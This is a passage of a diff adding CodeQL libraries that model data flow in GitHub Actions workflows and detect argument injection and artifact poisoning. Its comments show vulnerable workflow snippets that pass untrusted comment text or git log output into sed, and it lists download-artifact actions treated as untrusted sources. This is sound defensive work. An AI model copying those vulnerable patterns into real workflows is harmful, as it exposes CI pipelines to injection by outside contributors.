workflow get called + */ +class DataFlowCall instanceof Cfg::Node { + DataFlowCall() { super.getAstNode() instanceof Uses } + + /** Gets a textual representation of this element. */ + string toString() { result = super.toString() } + + string getName() { result = super.getAstNode().(Uses).getCallee() } + + DataFlowCallable getEnclosingCallable() { result = super.getScope() } + + /** Gets a best-effort total ordering. */ + int totalorder() { none() } + + /** Gets the location of this call. */ + Location getLocation() { result = this.(Cfg::Node).getLocation() } +} + +/** + * A Cfg scope that can be called + */ +class DataFlowCallable instanceof Cfg::CfgScope { + string toString() { result = super.toString() } + + string getName() { + result = this.(ReusableWorkflowImpl).getResolvedPath() or + result = this.(CompositeActionImpl).getResolvedPath() + } + + /** Gets a best-effort total ordering. */ + int totalorder() { none() } + + /** Gets the location of this callable. */ + Location getLocation() { result = this.(Cfg::CfgScope).getLocation() } +} + +newtype TReturnKind = TNormalReturn() + +abstract class ReturnKind extends TReturnKind { + /** Gets a textual representation of this element. */ + abstract string toString(); +} + +class NormalReturn extends ReturnKind, TNormalReturn { + override string toString() { result = "return" } +} + +/** Gets a viable implementation of the target of the given `Call`. */ +DataFlowCallable viableCallable(DataFlowCall c) { c.getName() = result.getName() } + +/** + * Gets a node that can read the value returned from `call` with return kind + * `kind`. + */ +OutNode getAnOutNode(DataFlowCall call, ReturnKind kind) { call = result.getCall(kind) } + +private newtype TDataFlowType = TUnknownDataFlowType() + +/** + * A type for a data flow node. + * + * This may or may not coincide with any type system existing for the source + * language, but should minimally include unique types for individual closure + * expressions (typically lambdas). + */ +class DataFlowType extends TDataFlowType { + string toString() { result = "" } +} + +string ppReprType(DataFlowType t) { none() } + +predicate compatibleTypes(DataFlowType t1, DataFlowType t2) { any() } + +predicate typeStrongerThan(DataFlowType t1, DataFlowType t2) { none() } + +newtype TContent = + TFieldContent(string name) { + // We only use field flow for env, steps and jobs outputs + // not for accessing other context fields such as matrix or inputs + name = any(StepsExpression a).getFieldName() or + name = any(NeedsExpression a).getFieldName() or + name = any(JobsExpression a).getFieldName() or + name = any(EnvExpression a).getFieldName() + } + +predicate forceHighPrecision(Content c) { c instanceof FieldContent } + +class NodeRegion instanceof Unit { + string toString() { result = "NodeRegion" } + + predicate contains(Node n) { none() } + + int totalOrder() { result = 1 } +} + +/** + * Holds if the nodes in `nr` are unreachable when the call context is `call`. + */ +predicate isUnreachableInCall(NodeRegion nr, DataFlowCall call) { none() } + +class ContentApprox = ContentSet; + +ContentApprox getContentApprox(Content c) { result = c } + +/** + * Made a string to match the ArgumentPosition type. + */ +class ParameterPosition extends string { + ParameterPosition() { + exists(any(ReusableWorkflow w).getInput(this)) or + exists(any(CompositeAction a).getInput(this)) + } +} + +/** + * Made a string to match `With:` keys in the AST + */ +class ArgumentPosition extends string { + ArgumentPosition() { exists(any(Uses e).getArgumentExpr(this)) } +} + +/** + */ +predicate parameterMatch(ParameterPosition ppos, ArgumentPosition apos) { ppos = apos } + +/** + * Holds if there is a local flow step between a ${{ steps.xxx.outputs.yyy }} expression accesing a step output field + * and the step output itself. But only for those cases where the step output is defined externally in a MaD Source + * specification. The reason for this is that we don't currently have a way to specify that a source starts with a + * non-empty access path so we cannot write a Source that stores the taint in a Content, we can only do that for steps + * (storeStep). The easiest thing is to add this local flow step that simulates a read step from the source node for a specific + * field name. + */ +predicate stepsCtxLocalStep(Node nodeFrom, Node nodeTo) { + exists(Uses astFrom, StepsExpression astTo | + madSource(nodeFrom, _, "output." + ["*", astTo.getFieldName()]) and + astFrom = nodeFrom.asExpr() and + astTo = nodeTo.asExpr() and + astTo.getTarget() = astFrom + ) +} + +/** + * Holds if there is a local flow step between a ${{ needs.xxx.outputs.yyy }} expression accesing a job output field + * and the step output itself. But only for those cases where the job (needs) output is defined externally in a MaD Source + * specification. The reason for this is that we don't currently have a way to specify that a source starts with a + * non-empty access path so we cannot write a Source that stores the taint in a Content, we can only do that for steps + * (storeStep). The easiest thing is to add this local flow step that simulates a read step from the source node for a specific + * field name. + */ +predicate needsCtxLocalStep(Node nodeFrom, Node nodeTo) { + exists(Uses astFrom, NeedsExpression astTo | + madSource(nodeFrom, _, "output." + astTo.getFieldName()) and + astFrom = nodeFrom.asExpr() and + astTo = nodeTo.asExpr() and + astTo.getTarget() = astFrom + ) +} + +/** + * Holds if there is a local flow step between a ${{}} expression accesing an input variable and the input itself + * e.g. ${{ inputs.foo }} + */ +predicate inputsCtxLocalStep(Node nodeFrom, Node nodeTo) { + exists(AstNode astFrom, InputsExpression astTo | + astFrom = nodeFrom.asExpr() and + astTo = nodeTo.asExpr() and + astTo.getTarget() = astFrom + ) +} + +/** + * Holds if there is a local flow step between a ${{}} expression accesing a matrix variable and the matrix itself + * e.g. ${{ matrix.foo }} + */ +predicate matrixCtxLocalStep(Node nodeFrom, Node nodeTo) { + exists(AstNode astFrom, MatrixExpression astTo | + astFrom = nodeFrom.asExpr() and + astTo = nodeTo.asExpr() and + astTo.getTarget() = astFrom + ) +} + +/** + * Holds if there is a local flow step between a ${{}} expression accesing an env var and the var definition itself + * e.g. ${{ env.foo }} + */ +predicate envCtxLocalStep(Node nodeFrom, Node nodeTo) { + exists(AstNode astFrom, EnvExpression astTo | + astFrom = nodeFrom.asExpr() and + astTo = nodeTo.asExpr() and + ( + madSource(nodeFrom, _, "env." + astTo.getFieldName()) + or + astTo.getTarget() = astFrom + ) + ) +} + +/** + * Holds if there is a local flow step from `nodeFrom` to `nodeTo`. + * For Actions, we dont need SSA nodes since it should be already in SSA form + * Local flow steps are always between two nodes in the same Cfg scope. + */ +pragma[nomagic] +predicate localFlowStep(Node nodeFrom, Node nodeTo) { + stepsCtxLocalStep(nodeFrom, nodeTo) or + needsCtxLocalStep(nodeFrom, nodeTo) or + inputsCtxLocalStep(nodeFrom, nodeTo) or + matrixCtxLocalStep(nodeFrom, nodeTo) or + envCtxLocalStep(nodeFrom, nodeTo) +} + +/** + * This is the local flow predicate that is used as a building block in global + * data flow. + */ +cached +predicate simpleLocalFlowStep(Node nodeFrom, Node nodeTo, string model) { + localFlowStep(nodeFrom, nodeTo) and model = "" +} + +/** + * Holds if data can flow from `node1` to `node2` through a non-local step + * that does not follow a call edge. For example, a step through a global + * variable. + * We throw away the call context and let us jump to any location + * AKA teleport steps + * local steps are preferible since they are more predictable and easier to control + */ +predicate jumpStep(Node nodeFrom, Node nodeTo) { none() } + +/** + * Holds if a Expression reads a field from a job (needs/jobs), step (steps) output via a read of `c` (fieldname) + */ +predicate ctxFieldReadStep(Node node1, Node node2, ContentSet c) { + exists(SimpleReferenceExpression access | + ( + access instanceof NeedsExpression or + access instanceof StepsExpression or + access instanceof JobsExpression or + access instanceof EnvExpression + ) and + c = any(FieldContent ct | ct.getName() = access.getFieldName()) and + node1.asExpr() = access.getTarget() and + node2.asExpr() = access + ) +} + +/** + * Holds if data can flow from `node1` to `node2` via a read of `c`. Thus, + * `node1` references an object with a content `c.getAReadContent()` whose + * value ends up in `node2`. + * Store steps without corresponding reads are pruned aggressively very early, since they can never contribute to a complete path. + */ +predicate readStep(Node node1, ContentSet c, Node node2) { ctxFieldReadStep(node1, node2, c) } + +/** + * Stores an output expression (node1) into its OutputsStm node (node2) + * using the output variable name as the access path + */ +predicate fieldStoreStep(Node node1, Node node2, ContentSet c) { + exists(Outputs out, string fieldName | + node1.asExpr() = out.getOutputExpr(fieldName) and + node2.asExpr() = out and + c = any(FieldContent ct | ct.getName() = fieldName) + ) +} + +/** + * Holds if data can flow from `node1` to `node2` via a store into `c`. Thus, + * `node2` references an object with a content `c.getAStoreContent()` that + * contains the value of `node1`. + * Store steps without corresponding reads are pruned aggressively very early, since they can never contribute to a complete path. + */ +predicate storeStep(Node node1, ContentSet c, Node node2) { + fieldStoreStep(node1, node2, c) or + madStoreStep(node1, node2, c) or + envToOutputStoreStep(node1, node2, c) or + envToEnvStoreStep(node1, node2, c) or + commandToOutputStoreStep(node1, node2, c) or + commandToEnvStoreStep(node1, node2, c) +} + +/** + * Holds if values stored inside content `c` are cleared at node `n`. For example, + * any value stored inside `f` is cleared at the pre-update node associated with `x` + * in `x.f = newValue`. + */ +predicate clearsContent(Node n, ContentSet c) { none() } + +/** + * Holds if the value that is being tracked is expected to be stored inside content `c` + * at node `n`. + */ +predicate expectsContent(Node n, ContentSet c) { none() } + +/** + * Holds if flow is allowed to pass from parameter `p` and back to itself as a + * side-effect, resulting in a summary from `p` to itself. + * + * One example would be to allow flow like `p.foo = p.bar;`, which is disallowed + * by default as a heuristic. + */ +predicate allowParameterReturnInSelf(ParameterNode p) { none() } + +predicate localMustFlowStep(Node nodeFrom, Node nodeTo) { localFlowStep(nodeFrom, nodeTo) } + +private newtype TLambdaCallKind = TNone() + +class LambdaCallKind = TLambdaCallKind; + +/** Holds if `creation` is an expression that creates a lambda of kind `kind` for `c`. */ +predicate lambdaCreation(Node creation, LambdaCallKind kind, DataFlowCallable c) { none() } + +/** Holds if `call` is a lambda call of kind `kind` where `receiver` is the lambda expression. */ +predicate lambdaCall(DataFlowCall call, LambdaCallKind kind, Node receiver) { none() } + +/** Extra data-flow steps needed for lambda flow analysis. */ +predicate additionalLambdaFlowStep(Node nodeFrom, Node nodeTo, boolean preservesValue) { none() } + +/** + * Since our model is so simple, we dont want to compress the local flow steps. + * This compression is normally done to not show SSA steps, casts, etc. + */ +predicate neverSkipInPathGraph(Node node) { any() } + +predicate knownSourceModel(Node source, string model) { none() } + +predicate knownSinkModel(Node sink, string model) { none() } diff --git a/actions/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll b/actions/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll new file mode 100644 index 000000000000..9c05256e2fa0 --- /dev/null +++ b/actions/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll @@ -0,0 +1,194 @@ +private import codeql.dataflow.DataFlow +private import codeql.actions.Ast +private import codeql.actions.Cfg as Cfg +private import codeql.Locations +private import DataFlowPrivate + +class Node extends TNode { + /** Gets a textual representation of this element. */ + string toString() { none() } + + Location getLocation() { none() } + + /** + * Holds if this element is at the specified location. + * The location spans column `startcolumn` of line `startline` to + * column `endcolumn` of line `endline` in file `filepath`. + * For more information, see + * [Locations](https://codeql.github.com/docs/writing-codeql-queries/providing-locations-in-codeql-queries/). + */ + predicate hasLocationInfo( + string filepath, int startline, int startcolumn, int endline, int endcolumn + ) { + this.getLocation().hasLocationInfo(filepath, startline, startcolumn, endline, endcolumn) + } + + AstNode asExpr() { none() } +} + +/** + * Any Ast Expression. + * UsesExpr, RunExpr, ArgumentExpr, VarAccessExpr, ... + */ +class ExprNode extends Node, TExprNode { + private DataFlowExpr expr; + + ExprNode() { this = TExprNode(expr) } + + Cfg::Node getCfgNode() { result = expr } + + override string toString() { result = expr.toString() } + + override Location getLocation() { result = expr.getLocation() } + + override AstNode asExpr() { result = expr.getAstNode() } +} + +/** + * Reusable workflow input nodes + */ +class ParameterNode extends ExprNode { + private Input input; + + ParameterNode() { this.asExpr() = input } + + predicate isParameterOf(DataFlowCallable c, ParameterPosition pos) { + input = c.(ReusableWorkflow).getInput(pos) or + input = c.(CompositeAction).getInput(pos) + } + + override string toString() { result = "input " + input.toString() } + + override Location getLocation() { result = input.getLocation() } + + Input getInput() { result = input } +} + +/** + * A call to a data flow callable (Uses). + */ +class CallNode extends ExprNode { + private DataFlowCall call; + + CallNode() { this.getCfgNode() instanceof DataFlowCall } + + DataFlowCallable getCalleeNode() { result = viableCallable(this.getCfgNode()) } +} + +/** + * An argument to a Uses step (call). + */ +class ArgumentNode extends ExprNode { + ArgumentNode() { this.getCfgNode().getAstNode() = any(Uses e).getArgumentExpr(_) } + + predicate argumentOf(DataFlowCall call, ArgumentPosition pos) { + this.getCfgNode() = call.(Cfg::Node).getASuccessor+() and + call.(Cfg::Node).getAstNode() = + any(Uses e | e.getArgumentExpr(pos) = this.getCfgNode().getAstNode()) + } +} + +/** + * Reusable workflow output nodes + */ +class ReturnNode extends ExprNode { + private Outputs outputs; + + ReturnNode() { + this.asExpr() = outputs and + ( + exists(ReusableWorkflow w | w.getOutputs() = outputs) or + exists(CompositeAction a | a.getOutputs() = outputs) + ) + } + + ReturnKind getKind() { result = TNormalReturn() } + + override string toString() { result = "output " + outputs.toString() } + + override Location getLocation() { result = outputs.getLocation() } +} + +/** Gets the node corresponding to `e`. */ +Node exprNode(DataFlowExpr e) { result = TExprNode(e) } + +/** + * An entity that represents a set of `Content`s. + * + * The set may be interpreted differently depending on whether it is + * stored into (`getAStoreContent`) or read from (`getAReadContent`). + */ +class ContentSet instanceof Content { + /** Gets a content that may be stored into when storing into this set. */ + Content getAStoreContent() { result = this } + + /** Gets a content that may be read from when reading from this set. */ + Content getAReadContent() { result = this } + + /** Gets a textual representation of this content set. */ + string toString() { result = super.toString() } + + /** + * Holds if this element is at the specified location. + * The location spans column `startcolumn` of line `startline` to + * column `endcolumn` of line `endline` in file `filepath`. + * For more information, see + * [Locations](https://codeql.github.com/docs/writing-codeql-queries/providing-locations-in-codeql-queries/). + */ + predicate hasLocationInfo( + string filepath, int startline, int startcolumn, int endline, int endcolumn + ) { + super.hasLocationInfo(filepath, startline, startcolumn, endline, endcolumn) + } +} + +/** + * A reference contained in an object. Examples include instance fields, the + * contents of a collection object, the contents of an array or pointer. + */ +class Content extends TContent { + /** Gets the type of the contained data for the purpose of type pruning. */ + DataFlowType getType() { any() } + + /** Gets a textual representation of this element. */ + abstract string toString(); + + /** + * Holds if this element is at the specified location. + * The location spans column `startcolumn` of line `startline` to + * column `endcolumn` of line `endline` in file `filepath`. + * For more information, see + * [Locations](https://codeql.github.com/docs/writing-codeql-queries/providing-locations-in-codeql-queries/). + */ + predicate hasLocationInfo( + string filepath, int startline, int startcolumn, int endline, int endcolumn + ) { + filepath = "" and startline = 0 and startcolumn = 0 and endline = 0 and endcolumn = 0 + } +} + +/** A field of an object, for example an instance variable. */ +class FieldContent extends Content, TFieldContent { + private string name; + + FieldContent() { this = TFieldContent(name) } + + /** Gets the name of the field. */ + string getName() { result = name } + + override string toString() { result = name } +} + +predicate hasLocalFlow(Node n1, Node n2) { + n1 = n2 or + simpleLocalFlowStep(n1, n2, _) or + exists(ContentSet c | ctxFieldReadStep(n1, n2, c)) +} + +predicate hasLocalFlowExpr(AstNode n1, AstNode n2) { + exists(Node dn1, Node dn2 | + dn1.asExpr() = n1 and + dn2.asExpr() = n2 and + hasLocalFlow(dn1, dn2) + ) +} diff --git a/actions/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll b/actions/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll new file mode 100644 index 000000000000..bd9d73b41703 --- /dev/null +++ b/actions/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll @@ -0,0 +1,24 @@ +/** + * This module provides extensible predicates for defining MaD models. + */ + +/** + * Holds if a source model exists for the given parameters. + */ +extensible predicate actionsSourceModel( + string action, string version, string output, string kind, string provenance +); + +/** + * Holds if a summary model exists for the given parameters. + */ +extensible predicate actionsSummaryModel( + string action, string version, string input, string output, string kind, string provenance +); + +/** + * Holds if a sink model exists for the given parameters. + */ +extensible predicate actionsSinkModel( + string action, string version, string input, string kind, string provenance +); diff --git a/actions/ql/lib/codeql/actions/dataflow/internal/TaintTrackingImplSpecific.qll b/actions/ql/lib/codeql/actions/dataflow/internal/TaintTrackingImplSpecific.qll new file mode 100644 index 000000000000..2fd062e76607 --- /dev/null +++ b/actions/ql/lib/codeql/actions/dataflow/internal/TaintTrackingImplSpecific.qll @@ -0,0 +1,12 @@ +/** + * Provides Actions-specific definitions for use in the taint tracking library. + * Implementation of https://github.com/github/codeql/blob/main/shared/dataflow/codeql/dataflow/TaintTracking.qll + */ + +private import codeql.Locations +private import codeql.dataflow.TaintTracking +private import DataFlowImplSpecific + +module ActionsTaintTracking implements InputSig { + import TaintTrackingPrivate +} diff --git a/actions/ql/lib/codeql/actions/dataflow/internal/TaintTrackingPrivate.qll b/actions/ql/lib/codeql/actions/dataflow/internal/TaintTrackingPrivate.qll new file mode 100644 index 000000000000..60d5a8d7baaa --- /dev/null +++ b/actions/ql/lib/codeql/actions/dataflow/internal/TaintTrackingPrivate.qll @@ -0,0 +1,40 @@ +/** + * Provides modules for performing local (intra-procedural) and + * global (inter-procedural) taint-tracking analyses. + */ + +private import DataFlowPrivate +private import codeql.actions.DataFlow +private import codeql.actions.dataflow.TaintSteps +private import codeql.actions.Ast + +/** + * Holds if `node` should be a sanitizer in all global taint flow configurations + * but not in local taint. + */ +predicate defaultTaintSanitizer(DataFlow::Node node) { none() } + +// predicate defaultAdditionalTaintStep(DataFlow::Node nodeFrom, DataFlow::Node nodeTo) { +// any(AdditionalTaintStep s).step(nodeFrom, nodeTo) +// } +/** + * Holds if the additional step from `nodeFrom` to `nodeTo` should be included + * in all global taint flow configurations. + */ +cached +predicate defaultAdditionalTaintStep(DataFlow::Node nodeFrom, DataFlow::Node nodeTo, string model) { + any(AdditionalTaintStep s).step(nodeFrom, nodeTo) and model = "" +} + +/** + * Holds if taint flow configurations should allow implicit reads of `c` at sinks + * and inputs to additional taint steps. + */ +bindingset[node] +predicate defaultImplicitTaintRead(DataFlow::Node node, DataFlow::ContentSet c) { none() } + +/** + * Holds if the additional step from `src` to `sink` should be considered in + * speculative taint flow exploration. + */ +predicate speculativeTaintStep(DataFlow::Node src, DataFlow::Node sink) { none() } diff --git a/actions/ql/lib/codeql/actions/ideContextual/IDEContextual.qll b/actions/ql/lib/codeql/actions/ideContextual/IDEContextual.qll new file mode 100644 index 000000000000..0e58b1d878be --- /dev/null +++ b/actions/ql/lib/codeql/actions/ideContextual/IDEContextual.qll @@ -0,0 +1,19 @@ +private import codeql.files.FileSystem + +/** + * Returns an appropriately encoded version of a filename `name` + * passed by the VS Code extension in order to coincide with the + * output of `.getFile()` on locatable entities. + */ +cached +File getFileBySourceArchiveName(string name) { + // The name provided for a file in the source archive by the VS Code extension + // has some differences from the absolute path in the database: + // 1. colons are replaced by underscores + // 2. there's a leading slash, even for Windows paths: "C:/foo/bar" -> + // "/C_/foo/bar" + // 3. double slashes in UNC prefixes are replaced with a single slash + // We can handle 2 and 3 together by unconditionally adding a leading slash + // before replacing double slashes. + name = ("/" + result.getAbsolutePath().replaceAll(":", "_")).replaceAll("//", "/") +} diff --git a/actions/ql/lib/codeql/actions/ideContextual/printAst.qll b/actions/ql/lib/codeql/actions/ideContextual/printAst.qll new file mode 100644 index 000000000000..f8a7c16f0712 --- /dev/null +++ b/actions/ql/lib/codeql/actions/ideContextual/printAst.qll @@ -0,0 +1,137 @@ +/** + * Provides queries to pretty-print an Kaleidoscope abstract syntax tree as a graph. + * + * By default, this will print the AST for all nodes in the database. To change + * this behavior, extend `PrintASTConfiguration` and override `shouldPrintNode` + * to hold for only the AST nodes you wish to view. + */ + +private import codeql.actions.Ast +private import codeql.Locations + +/** + * The query can extend this class to control which nodes are printed. + */ +class PrintAstConfiguration extends string { + PrintAstConfiguration() { this = "PrintAstConfiguration" } + + /** + * Holds if the given node should be printed. + */ + predicate shouldPrintNode(PrintAstNode n) { any() } +} + +newtype TPrintNode = TPrintRegularAstNode(AstNode n) { any() } + +private predicate shouldPrintNode(PrintAstNode n) { + any(PrintAstConfiguration config).shouldPrintNode(n) +} + +/** + * A node in the output tree. + */ +class PrintAstNode extends TPrintNode { + /** Gets a textual representation of this node in the PrintAst output tree. */ + string toString() { none() } + + /** + * Gets the child node with name `edgeName`. Typically this is the name of the + * predicate used to access the child. + */ + PrintAstNode getChild(string edgeName) { none() } + + /** Get the Location of this AST node */ + Location getLocation() { none() } + + /** Gets a child of this node. */ + final PrintAstNode getAChild() { result = this.getChild(_) } + + /** Gets the parent of this node, if any. */ + final PrintAstNode getParent() { result.getAChild() = this } + + /** Gets a value used to order this node amongst its siblings. */ + int getOrder() { + this = + rank[result](PrintRegularAstNode p, Location l, File f | + l = p.getLocation() and + f = l.getFile() + | + p + order by + f.getBaseName(), f.getAbsolutePath(), l.getStartLine(), l.getStartColumn(), + l.getEndLine(), l.getEndColumn() + ) + } + + /** + * Gets the value of the property of this node, where the name of the property + * is `key`. + */ + final string getProperty(string key) { + key = "semmle.label" and + result = this.toString() + or + key = "semmle.order" and result = this.getOrder().toString() + } +} + +/** An `AstNode` in the output tree. */ +class PrintRegularAstNode extends PrintAstNode, TPrintRegularAstNode { + AstNode astNode; + + PrintRegularAstNode() { this = TPrintRegularAstNode(astNode) } + + override string toString() { + result = "[" + concat(astNode.getAPrimaryQlClass(), ", ") + "] " + astNode.toString() + } + + override Location getLocation() { result = astNode.getLocation() } + + override PrintAstNode getChild(string name) { + exists(int i | + name = i.toString() and + result = + TPrintRegularAstNode(rank[i](AstNode child, Location l | + child.getParentNode() = astNode and + child.getLocation() = l + | + child + order by + l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), + child.toString() + )) + ) + } +} + +/** + * Holds if `node` belongs to the output tree, and its property `key` has the + * given `value`. + */ +query predicate nodes(PrintAstNode node, string key, string value) { + value = node.getProperty(key) and shouldPrintNode(node) +} + +/** + * Holds if `target` is a child of `source` in the AST, and property `key` of + * the edge has the given `value`. + */ +query predicate edges(PrintAstNode source, PrintAstNode target, string key, string value) { + shouldPrintNode(source) and + shouldPrintNode(target) and + target = source.getChild(_) and + ( + key = "semmle.label" and + value = strictconcat(string name | source.getChild(name) = target | name, "/") + or + key = "semmle.order" and + value = target.getProperty("semmle.order") + ) +} + +/** + * Holds if property `key` of the graph has the given `value`. + */ +query predicate graphProperties(string key, string value) { + key = "semmle.graphKind" and value = "tree" +} diff --git a/actions/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll b/actions/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll new file mode 100644 index 000000000000..1d461cca3df2 --- /dev/null +++ b/actions/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll @@ -0,0 +1,94 @@ +private import actions +private import codeql.actions.TaintTracking +private import codeql.actions.dataflow.ExternalFlow +import codeql.actions.dataflow.FlowSources +import codeql.actions.DataFlow + +abstract class ArgumentInjectionSink extends DataFlow::Node { + abstract string getCommand(); +} + +/** + * Holds if a Run step declares an environment variable, uses it as the argument to a command vulnerable to argument injection. + * e.g. + * env: + * BODY: ${{ github.event.comment.body }} + * run: | + * sed "s/FOO/$BODY/g" > /tmp/foo + */ +class ArgumentInjectionFromEnvVarSink extends ArgumentInjectionSink { + string command; + string argument; + + ArgumentInjectionFromEnvVarSink() { + exists(Run run, string var | + run.getScript() = this.asExpr() and + ( + exists(run.getInScopeEnvVarExpr(var)) or + var = "GITHUB_HEAD_REF" + ) and + run.getScript().getAnEnvReachingArgumentInjectionSink(var, command, argument) + ) + } + + override string getCommand() { result = command } +} + +/** + * Holds if a Run step executes a command that returns untrusted data which flows to an unsafe argument + * e.g. + * run: | + * BODY=$(git log --format=%s) + * sed "s/FOO/$BODY/g" > /tmp/foo + */ +class ArgumentInjectionFromCommandSink extends ArgumentInjectionSink { + string command; + string argument; + + ArgumentInjectionFromCommandSink() { + exists(CommandSource source, Run run | + run = source.getEnclosingRun() and + this.asExpr() = run.getScript() and + run.getScript().getACmdReachingArgumentInjectionSink(source.getCommand(), command, argument) + ) + } + + override string getCommand() { result = command } +} + +/** + * Holds if a Run step declares an environment variable, uses it as the argument to a command vulnerable to argument injection. + */ +class ArgumentInjectionFromMaDSink extends ArgumentInjectionSink { + ArgumentInjectionFromMaDSink() { madSink(this, "argument-injection") } + + override string getCommand() { result = "unknown" } +} + +/** + * A taint-tracking configuration for unsafe user input + * that is used to construct and evaluate a code script. + */ +private module ArgumentInjectionConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { + source instanceof RemoteFlowSource + or + exists(Run run | + run.getScript() = source.asExpr() and + run.getScript().getAnEnvReachingArgumentInjectionSink("GITHUB_HEAD_REF", _, _) + ) + } + + predicate isSink(DataFlow::Node sink) { sink instanceof ArgumentInjectionSink } + + predicate isAdditionalFlowStep(DataFlow::Node pred, DataFlow::Node succ) { + exists(Run run, string var | + run.getInScopeEnvVarExpr(var) = pred.asExpr() and + succ.asExpr() = run.getScript() and + run.getScript().getAnEnvReachingArgumentInjectionSink(var, _, _) + ) + } +} + +/** Tracks flow of unsafe user input that is used to construct and evaluate a code script. */ +module ArgumentInjectionFlow = TaintTracking::Global; diff --git a/actions/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/actions/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll new file mode 100644 index 000000000000..d8d5f83c867d --- /dev/null +++ b/actions/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll @@ -0,0 +1,322 @@ +import actions +private import codeql.actions.TaintTracking +import codeql.actions.DataFlow +import codeql.actions.dataflow.FlowSources +import codeql.actions.security.PoisonableSteps +import codeql.actions.security.UntrustedCheckoutQuery + +string unzipRegexp() { result = "(unzip|tar)\\s+.*" } + +string unzipDirArgRegexp() { result = "(-d|-C)\\s+([^ ]+).*" } + +abstract class UntrustedArtifactDownloadStep extends Step { + abstract string getPath(); +} + +class GitHubDownloadArtifactActionStep extends UntrustedArtifactDownloadStep, UsesStep { + GitHubDownloadArtifactActionStep() { + this.getCallee() = "actions/download-artifact" and + ( + // By default, the permissions are scoped so they can only download Artifacts within the current workflow run. + // To elevate permissions for this scenario, you can specify a github-token along with other repository and run identifiers + this.getArgument("run-id").matches("%github.event.workflow_run.id%") and + exists(this.getArgument("github-token")) + or + // There is an artifact upload step in the same workflow which can be influenced by an attacker on a checkout step + exists(LocalJob job, SimplePRHeadCheckoutStep checkout, UsesStep upload | + this.getEnclosingWorkflow().getAJob() = job and + job.getAStep() = checkout and + checkout.getATriggerEvent().getName() = "pull_request_target" and + checkout.getAFollowingStep() = upload and + upload.getCallee() = "actions/upload-artifact" + ) + ) + } + + override string getPath() { + if exists(this.getArgument("path")) + then result = normalizePath(this.getArgument("path")) + else result = "GITHUB_WORKSPACE/" + } +} + +class DownloadArtifactActionStep extends UntrustedArtifactDownloadStep, UsesStep { + DownloadArtifactActionStep() { + this.getCallee() = + [ + "dawidd6/action-download-artifact", "marcofaggian/action-download-multiple-artifacts", + "benday-inc/download-latest-artifact", "blablacar/action-download-last-artifact", + "levonet/action-download-last-artifact", "bettermarks/action-artifact-download", + "aochmann/actions-download-artifact", "cytopia/download-artifact-retry-action", + "alextompkins/download-prior-artifact", "nmerget/download-gzip-artifact", + "benday-inc/download-artifact", "synergy-au/download-workflow-artifacts-action", + "ishworkh/docker-image-artifact-download", "ishworkh/container-image-artifact-download", + "sidx1024/action-download-artifact", "hyperskill/azblob-download-artifact", + "ma-ve/action-download-artifact-with-retry" + ] and + ( + not exists(this.getArgument(["branch", "branch_name"])) + or + exists(this.getArgument(["branch", "branch_name"])) and + this.getArgument("allow_forks") = "true" + ) and + ( + not exists(this.getArgument(["commit", "commitHash", "commit_sha"])) or + not this.getArgument(["commit", "commitHash", "commit_sha"]) + .matches("%github.event.pull_request.head.sha%") + ) and + ( + not exists(this.getArgument("event")) or + not this.getArgument("event") = "pull_request" + ) and + ( + not exists(this.getArgument(["run-id", "run_id", "workflow-run-id", "workflow_run_id"])) or + this.getArgument(["run-id", "run_id", "workflow-run-id", "workflow_run_id"]) + .matches("%github.event.workflow_run.id%") + ) and + ( + not exists(this.getArgument("pr")) or + not this.getArgument("pr") + .matches(["%github.event.pull_request.number%", "%github.event.number%"]) + ) + } + + override string getPath() { + if exists(this.getArgument(["path", "download_path"])) + then result = normalizePath(this.getArgument(["path", "download_path"])) + else + if exists(this.getArgument("paths")) + then result = normalizePath(this.getArgument("paths").splitAt(" ")) + else result = "GITHUB_WORKSPACE/" + } +} + +class LegitLabsDownloadArtifactActionStep extends UntrustedArtifactDownloadStep, UsesStep { + LegitLabsDownloadArtifactActionStep() { + this.getCallee() = "Legit-Labs/action-download-artifact" and + ( + not exists(this.getArgument("branch")) or + not this.getArgument("branch") = ["main", "master"] + ) and + ( + not exists(this.getArgument("commit")) or + not this.getArgument("commit").matches("%github.event.pull_request.head.sha%") + ) and + ( + not exists(this.getArgument("event")) or + not this.getArgument("event") = "pull_request" + ) and + ( + not exists(this.getArgument("run_id")) or + not this.getArgument("run_id").matches("%github.event.workflow_run.id%") + ) and + ( + not exists(this.getArgument("pr")) or + not this.getArgument("pr").matches("%github.event.pull_request.number%") + ) + } + + override string getPath() { + if exists(this.getArgument("path")) + then result = normalizePath(this.getArgument("path")) + else result = "GITHUB_WORKSPACE/artifacts" + } +} + +class ActionsGitHubScriptDownloadStep extends UntrustedArtifactDownloadStep, UsesStep { + string script; + + ActionsGitHubScriptDownloadStep() { + // eg: + // - uses: actions/github-script@v6 + // with: + // script: | + // let allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({ + // owner: context.repo.owner, + // repo: context.repo.repo, + // run_id: context.payload.workflow_run.id, + // }); + // let matchArtifact = allArtifacts.data.artifacts.filter((artifact) => { + // return artifact.name == "" + // })[0]; + // let download = await github.rest.actions.downloadArtifact({ + // owner: context.repo.owner, + // repo: context.repo.repo, + // artifact_id: matchArtifact.id, + // archive_format: 'zip', + // }); + // var fs = require('fs'); + // fs.writeFileSync('${{github.workspace}}/test-results.zip', Buffer.from(download.data)); + this.getCallee() = "actions/github-script" and + this.getArgument("script") = script and + script.matches("%listWorkflowRunArtifacts(%") and + script.matches("%downloadArtifact(%") and + script.matches("%writeFileSync(%") and + // Filter out artifacts that were created by pull-request. + not script.matches("%exclude_pull_requests: true%") + } + + override string getPath() { + if + this.getAFollowingStep() + .(Run) + .getScript() + .getACommand() + .regexpMatch(unzipRegexp() + unzipDirArgRegexp()) + then + result = + normalizePath(trimQuotes(this.getAFollowingStep() + .(Run) + .getScript() + .getACommand() + 